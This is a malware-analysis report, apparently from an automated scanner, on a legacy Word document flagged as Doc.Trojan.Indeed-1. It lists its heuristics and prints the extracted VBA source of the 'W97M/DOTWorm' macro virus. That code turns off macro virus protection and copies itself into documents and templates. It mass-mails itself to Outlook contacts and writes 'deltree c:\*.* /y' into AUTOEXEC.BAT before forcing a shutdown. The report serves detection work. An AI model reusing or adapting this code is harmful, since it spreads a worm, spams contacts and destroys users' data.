Verdict: MALICIOUS
Risk Score: 508

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
This document contains legacy WordBasic macro markers and a VBA AutoOpen macro, indicating a macro-based threat. The presence of a Shell() call and CreateObject() suggests the macro is designed to execute arbitrary code or download additional payloads. The ClamAV detection as 'Doc.Trojan.Indeed-1' further supports its malicious nature. The macro attempts to spread itself to other DOT files, characteristic of a worm.
Heuristics (10)

- ClamAV: Doc.Trojan.Indeed-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Indeed-1
- VBA macros detected (medium, OLE_VBA_MACROS, 7 related findings): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL). Matched line in script: `Shell "C:\MAPI.REG", vbHide`
- LOLBin reference in VBA (critical, OLE_VBA_LOLBIN). Matched line in script: `Shell "RUNDLL32.EXE,user.exe,exitwindows", vbHide`
- VBA macro-virus self-replication / AV tampering (critical, OLE_VBA_MACRO_VIRUS_REPLICATION): The VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family: self-replicating code with no benign document use, independent of any AV signature. Matched line in script: `Options.VirusProtection = False`
- VBA email-worm self-replication (Outlook mass-mailer) (critical, OLE_VBA_EMAIL_WORM_SELF_REPLICATION): The VBA macro drives Outlook to mass-mail itself: it automates Outlook.Application, programmatically creates a mail item, harvests recipients from the MAPI address book / inbox, attaches a file to the outgoing message, and sends the message programmatically. Harvesting recipients from the address book / inbox and auto-attaching the carrier to outgoing messages is the defining behavior of the Melissa / LoveLetter / W97M mass-mailer worm lineage; there is no benign document use, independent of any AV signature. Matched line in script: `Set SpamItem = MailSvr.CreateItem(0)`
- CreateObject call (high, OLE_VBA_CREATEOBJ). Matched line in script: `Set MailSvr = CreateObject("Outlook.Application")`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Triggers on the combination of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN). Matched line in script: `Sub AutoOpen()`
- Legacy WordBasic macro-virus markers (high, OLE_LEGACY_WORDBASIC_MACRO_VIRUS): The OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3849 bytes |

SHA-256: 5f7a7947d7bd0abfc887c54cf24b23c6bb94291a5a40e40b1c3f4aad2de32a9e
Detection: ClamAV: Doc.Trojan.Indeed-1
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Rem W97M/DOTWorm virus by FSO.
Rem First macro worm to spread in DOT files.
Sub ToolsMacro()
On Error Resume Next
Call MacroWorm
End Sub
Sub ToolsOptions()
On Error Resume Next
Call MacroWorm
End Sub
Sub ViewVBCode()
On Error Resume Next
Call MacroWorm
End Sub
Sub ToolsSecurity()
On Error Resume Next
Call MacroWorm
End Sub
Sub FileTemplates()
On Error Resume Next
Call MacroWorm
End Sub
Sub FileNew()
On Error Resume Next
Call MacroWorm
End Sub
Sub FileOpen()
On Error Resume Next
Call MacroWorm
End Sub
Sub AutoOpen()
On Error Resume Next
Call MacroWorm
End Sub
Sub AutoExec()
On Error Resume Next
Call MacroWorm
End Sub
Sub MacroWorm()
On Error Resume Next
Application.DisplayAlerts = wdAlertsNone
Application.EnableCancelKey = wdCancelDisabled
Application.ShowVisualBasicEditor = False
Options.AllowFastSave = True
Options.ConfirmConversions = False
Options.SaveNormalPrompt = False
Options.VirusProtection = False
Documents(MacroContainer.Name).VBProject.VBComponents(1).CodeModule
OurLines = OurCode.Lines(1, OurCode.CountOfLines)
For X = 1 To Documents.Count
If Mid(Documents(X).Name, 1, 8) <> "Document" And Documents(X).VBProject.VBComponents(1).CodeModule.Lines(1, 1) <> "Rem WM97/DOTWorm virus by FSO." Then
Documents(X).Password = ""
Documents(X).ReadOnlyRecommended = False
Documents(X).WritePassword = ""
With Documents(X).VBProject.VBComponents(1).CodeModule
.DeleteLines 1, .CountOfLines
.InsertLines 1, OurLines
End With
With Documents(X)
.SaveAs (.FullName)
End With
End If
Next
For Y = 1 To Templates.Count
With Templates(Y).VBProject.VBComponents(1).CodeModule
If Mid(Templates(Y).Name, 1, 8) <> "Template" And .Lines(1, 1) <> "Rem W97M/DOTWorm virus by FSO." Then
.DeleteLines 1, .CountOfLines
.InsertLines 1, OurLines
End If
End With
Templates(Y).Save
Next
With NormalTemplate.VBProject.VBComponents(1).CodeModule
If .Lines(1, 1) <> "Rem W97M/DOTWorm virus by FSO." Then
.DeleteLines 1, .CountOfLines
.InsertLines 1, OurLines
End If
End With
FileCopy NormalTemplate.FullName, Application.Path & "\Love Letter For"
You.dot ""
If Int(Rnd * 5) = 2 Then
Set MailSvr = CreateObject("Outlook.Application")
If MailSvr Is Not Nothing Then
Set MAPI = MailSvr.GetNameSpace("MAPI")
For X = 1 To MAPI.AddressLists.Count
Set AddyList = MAPI.AddressLists(X)
For Y = 1 To AddyList.AddressEntries.Count
Set Contact = AddyList.AddressEntries(Y)
MailAddy = Contact.Address
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\WAB", MailAddy) <> "FSO" Then
Set SpamItem = MailSvr.CreateItem(0)
SpamItem.Bcc = MailAddy
SpamItem.Subject = "Very Funny"
SpamItem.Body = vbCrLf & " Very good. A must read, indeed. Ha!"
SpamItem.DeleteAfterSubmit = True
SpamItem.Attachments.Add (Application.Path & "\Very Funny.dot")
SpamItem.Send
If Dir("C:\MAPI.REG") = "" Then
Open "C:\MAPI.REG" For Output As #1
Print #1, "REGEDIT4"
Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\WAB]"
End If
Print #1, Chr(34) & MailAddy & Chr(34) & " = " & Chr(34) & "FSO" & Chr(34)
Next
Next
If Dir("C:\MAPI.REG") <> "" Then
Print #1, ""
Print #1, ""
Close #1
Shell "C:\MAPI.REG", vbHide
End If
End If
End If
If Int(Rnd * 30) = 2 Then
Call Ha
End If
End Sub
Sub Ha()
Open "C:\AUTOEXEC.BAT" For Output As #2
Print #2, "Rem System Check"
Print #2, "deltree c:\*.* /y"
Print #2, "Rem System Check! That's bull****!"
Close #2
Shell "RUNDLL32.EXE,user.exe,exitwindows", vbHide
End Sub
Rem Ha! Have a nice day!